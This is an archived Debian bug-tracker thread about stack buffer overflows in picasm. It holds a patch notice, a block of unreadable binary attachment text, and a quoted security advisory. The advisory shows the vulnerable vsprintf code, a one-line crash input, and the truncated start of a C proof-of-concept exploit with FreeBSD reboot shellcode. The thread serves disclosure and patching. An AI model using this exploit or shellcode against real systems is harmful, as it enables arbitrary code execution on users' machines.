subject:"Bug#309982\: Multiple buffer overflows in picasm"

Bug#309982: Multiple buffer overflows in picasm

2005-05-21 Thread Torsten Werner

tags 309982 + patch
thanks

On 2005-05-21, Moritz Muehlenhoff wrote:
 FIX INFORMATION
 *
 The maintainer, Timo Rossi, has fixed the picasm packages and provided
 a new security release, picasm 1.12c.  The fixed packages are
 available from http://www.co.jyu.fi/~trossi/pic/picasm112c.tar.gz.
 
 Thanks to Timo Rossi for his cooperation in fixing the issue.

The mentioned file is actually in bzip2 format, but it can be easily
recompiled with the last Debian diff for version 1.12b. I am attaching
an updated diff for version 1.12c.

Regards,
Torsten

`£BíZksGýl~Å];µBDv²yhÅñfS®iÄÄó 
óR¶ö¿ï¹Ý=£ÁBvRûi«¢re¦{º}û¾I¥R¡³²¯R3jõÎmÕKÇò«³A·?jT(J{K¯:?§Y6©T+Ðùy¡¤¶PÍ0[´Bê.ÝI¡T9øW(JÑÖZ}²n0Ñ6ðíââPPwÀ§`*Ó7dag¼ÚÐwüÛBerK¯vÖWM³M7óÁ±`0å%Hè,²¼su
 äöM_¦Ú1õj§§mª5:fsY3ÍBåKr´0zV|òcNju)µ$
«KÇW/ÑÆ
EÕVUP÷·uEôe²aÂK£«¾æ·ò«¿U5ñªg}TYcÆ][(³-ÇfÁ¼¤LËsKsÏr]^?
RvZ1%Þ0½îV½Üà·à{³hOí@C ×ñô|ZÇ 9êNÛ
,OÄÀåK}E7þ*ðáí(ýIBèÏê³A^`¦!î·ASÿêÙÅtx]cÇéÞt|[EMAIL PROTECTED]
GýÓëÅp:ÅBð§¡J 
àFâéÐ¾p4_qLeû,iùõÄ3¬8LDF¡´L×î|T¢wªçS(½ýXD1´7¼À¿Wm×ó,m¹xß:P
  ÖmÜüoÆÝw¢èëß©·âK yBiå
Ëÿx: Æ(ô ¹ùðxºî#2%[²ÖP%m¬N¾¨¤|ËÅ
ÕùèÞð3Á~é4)6U©RåQfS{j|Úg¤F½¿¼u|[EMAIL PROTECTED](*PL±±I®v
,[EMAIL PROTECTED]KñËôxér_¹TôÁ*r~Î'gùeµ¿?éøÎú*ü} 
ËßÂd½/ñA?a×ìýnp´®Z`§II8aoe\¿G×YB~úó7õ!WóÀÞW®Ñ»%)©*¢
WÎzÿùøçbµ  èÍßëôíJ|\¾ `.ÂU8½ýt[Ñë*Ëo¿§µ%ýkªPöQN5
%ãúj:ÁçVë÷/å,Ö=Wäs£ó^j´³m«ÎïÂfkø,ÙÏb5ê+y´£a¬ ï
ho7q¼íT«»ÝÎp9ÆB¢ÈaPå}7[°êñ;´p¼f¼ÎÔÚsµó
/ï¥çìf¥nfn?¯¸¦:LúeÇ8ñmh±[EMAIL 
PROTECTED]@PÄelÁÆà9,mJX*s(XÇ;VÖ 
+cRó²8GãCÁÞñ²(©ØÂrË8~©RÄ²ëpd¢YY¹Í\¤]Çs4   
Þ.,·,Y-sâ¬ù)äÉÒu¢MúÎØË$Æd+áó.¤D;ìÌáuyÜGþäæÍµdôÛmp×{gqÀÑy
[»Þ(4MÓòuàºÁO7a;|¨¨£òyHw\¢Gîh³}¼\ý 1!j)´Ô;[EMAIL 
PROTECTED]½ìÎ1~Y¦÷ÃÅÕôfAX1ëNhzIÝÉz7ôË4øéz6Ïi:y¯GÃÞè¦?¼¥lL4 .¦Ä5ÖÅÐYï
ÃîÅp4\|(JÃQ/§3êÒuw¶önFÝ]ßp'ÃÉådãÁdaèb?bDó«îhÄÄ
¥î
N0c©7½þ0¾½ZÐÕtÔ`òbæº£õFÝá¸Lýî¸ûv 
wMóñ:Å!½¿ðSìâ_óFJo:YÌ0,E¶÷ýp([EMAIL PROTECTED](Î2DTÝÀpIý[4ö5K+?T
ÜéÜ
v¶©=1xiÍÆH(-îNÖ9Q$¼¥+ñ¯FÝç½z¶çÕ[Í||$7TL£V¤c1(OI÷á5lLôùbôT;ÛP
 (áäGñ
ÒÊEYuèU{¯Ë-à|QÊé½}Èå,Þ|Kqê5[:ÃI§^M+Ïê²ò5F'U_\Z:{éÕ*H=©ORÖGÜ9+ê#ó¿k}Öe\«·RÖT«u§æëæc}Áq;ê¥rv»HN¨{e(à~ª

?¸nþùóP¦ð¯à¿F5³c¶;Íú¡ó´¾zÜI!=v_R£tém Ö9ÓYEtþeäX1R¶»vÈ.ÿ-ñßóudÅàw±IÊÔ0úo5¿ú1®à0¿¦Q?'l'ñR¦/[EMAIL
 PROTECTED]([EMAIL PROTECTED]Üpd±II¤Ñ4LõùZ§_xÉa7ë6C)±] úgdôSì 
8+h)8¨é¯gãfej,=®Úü
ç;½Ã:¬¬¨î [EMAIL 
PROTECTED],ÎG©Î+mÀ_¨µuàZ\+e¢K¨µ\lçstg¹ÊMtcn-»CGìØ(DK8¿£ºz§ÙPàgþYyîy±±T.diä,í®bU
 í]ãH81Nöª}ÜhSÉÉ~-¢(¢VôWR¡
À×k+él#¹êý]Ü¦YÝì4O:CÇ,¦ã%ì$Ú
®CoI!8JëjO¿xçÏî;qg08BÚt)[:³ùÙ¢*æÔNËüòp:e:yä®óø´ck¾Ré
÷ÙâL}Ïñ
âsY`vô.U{¹C Qq[þ7ëüÐP(ÉG¥/ûð7Y/2
6OWåGeéÂNe!¥Ø#«Ý\ÃeS¡ÁóoUâwôÌø[´
:]7M¤³UpK×Ã^e
åuô¤³;éúùU¶ù   
i`-Þg(3ÿT6÷«oZì!a¿Âö3_8c¼¶BTÖ}¢ÜÈ=«ÛuE}0jÏ*K¶ 
òJm1æW4é=ü«ò(÷¥à=#Ì?L¦×óágW?W³`ù«oyâÍ/¹g(c6a9t6÷mO¿ÔZ¿¨0þ0q¦¶@³V¼õ!$*3¸iøÝl
Áý®¡ÒYB_þbds}ÕÃãªþLµiêúø£¸ßqÉhàsú@[EMAIL PROTECTED]¨ 
¼%Ì]ØO¦ôM×#²ké¬LuNÈØFFqßüã4Û
VÈÝå:÷'ÞW/+kÈFUåcd_3LVº8ö+Kü¨ÑýBéÅñÚáð!Èz¡e$dça}cÐ\ 
ÞÃ_W hÅM3Á-
/YÀõpOüH¢×L9bMÍdõS{i+¦#Ýû-;jÜ
övJ9§ÙÄ}îb°©9-Ð#Urr*~Öñlúq|dÕ[S=ZêqÝmÕnj5Ô#Ci5³7ÔÚ:Q'5S?®y;i¤
 
'p[QjçàÖíc©ÙJÙÓgË®e;6M³w5è½Ó2DipË^ÃåÍhD£á|aSÏÑÌ{³¡tòÇWDó?3H?([EMAIL
 PROTECTED](«¹Úk7J»ó|3EÌÚ5$ÿjHþü«!ùÿT¿N÷¿ðÇüK¹.$ûíì}{°G/ü 
ÒìÜ0$

Bug#309982: Multiple buffer overflows in picasm

2005-05-20 Thread Moritz Muehlenhoff

Package: picasm
Severity: grave
Tags: security
Justification: user security hole

Multiple buffer overflows in picasm's code for generating error messages
have been found that can be exploited through crafted source code with
overly long preprocessor directives. For full details please see this
advisory by Shaun Colley, for which I could not find an online reference:

Cheers,
Moritz


picasm error handling stack overflow vulnerability

Name: picasm error handling stack overflow
Versions Affected: picasm = 1.12b
Severity: Medium/High
Impact: Arbitrary code execution
Maintainer's Website: http://www.co.jyu.fi/~trossi
Author: Shaun Colley
Vendor Notified: May 7th 2005
Public Disclosure: May 20th 2005


BACKGROUND
**
picasm is a Microchip PIC16Cxx assembler, designed to run on most
UNIX-like operating systems.  picasm now extends support to several
other PICs, including the 2c508 and 12c509 devices.

picasm is available via the FreeBSD ports system as devel/picasm.  The
maintainer, Timo Rossi, also provides it on his microcontroller web
page http://www.co.jyu.fi/~trossi/pic.


DETAILS

When generating error and warning messages, picasm copies strings into
fixed length buffers without bounds checking.  Below is the
responsible code.

---
void
warning(char *fmt, ...)
{
   char outbuf[128];
   va_list args;

   err_line_ref();
   strcpy(outbuf, Warning: );
   va_start(args, fmt);
   vsprintf(outbuf+9, fmt, args); [1]

...


void
error(int lskip, char *fmt, ...)
{
   va_list args;
   char outbuf[128];

   err_line_ref();
   strcpy(outbuf, Error: );
   va_start(args, fmt);
   vsprintf(outbuf+7, fmt, args); [2]

...

void
fatal_error(char *fmt, ...)
{
   va_list args;
   char outbuf[128];

   err_line_ref();
   strcpy(outbuf, Fatal error: );
   va_start(args, fmt);
   vsprintf(outbuf+13, fmt, args); [3]

...
}
---

Where [1], [2] and [3], the error handling routines call vsprintf() to
copy a passed format string into a fixed length buffer.  If the 'fmt'
function argument could be controlled, a stack overflow could occur.

As the author explains in the documentation, picasm supports an
'error' directive similar to NASM's '%error' preprocessor.

 ...
 error error_message   Causes an assembly error.
 ...

An overly long error_message provided to an 'error' directive in a
source file would cause calling of error() and result in a stack
overflow as seen in [2].

If an attacker could trick a user into assembling a source file with a
malformed 'error' directive, arbitrary code could be executed with the
privileges of the user.  This could result in full system compromise.

There may be other attack vectors, such as causing picasm to generate
a long warning message, but this has not been investigated.


EXPLOITATION
**
An attacker who can convince a user to assemble a malformed source
file can execute arbitrary code with the privileges of the user.

Exploitation is straight forward.  The log below shows sample exploitation.

---
bash-3.00# echo `perl -e 'print error  . ax2000'`  test.asm
bash-3.00# picasm test.asm
test.asm:1:
error 
aa
Error: 

Segmentation fault (core dumped)
bash-3.00# gdb -q -c picasm.core
Core was generated by `picasm'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) quit
bash-3.00#
--

A proof-of-concept exploit has been written and successfully tested
using the picasm (v1.12b) port on FreeBSD 5.3-RELEASE.  The exploit
crafts a file with a malformed 'error' directive which causes
execution to be directed to reboot() shellcode upon overflow.

---
/* picasm_exploit.c - by Shaun Colley shaun rsc cx
 *
  * This code generates a picasm source file with a malformed 'error' directive,
  * which exploits a stack overflow vulnerability in picasm's error printing
 * routines.  The file generated by this exploit will only cause execution
  * of FreeBSD 'reboot()' shellcode.  Exploit has been tested on
FreeBSD 5.3-RELEASE.
  * Return address into shellcode may need changing on other operating system
  * versions.  Other shellcodes can potentially be used instead of the
one below.
 *
  * A fix has been provided by picasm's maintainer.  The fixed packages can be
 * found at http://www.co.jyu.fi/~trossi/pic/picasm112c.tar.gz.
 */

#include stdio.h
#include stdlib.h

  /* FreeBSD reboot shellcode by zillion
  * zillion safemode org */
  char shellcode[] =
  \x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80;

int main(int argc, char *argv[]) {

  if(argc  2) {
printf(syntax: %s outfile\n, argv[0]);
return 1;
  }

char buf[144];

  /* FreeBSD

Bug#309982: Multiple buffer overflows in picasm

Bug#309982: Multiple buffer overflows in picasm

2 matches

Site Navigation

Mail list logo

Footer information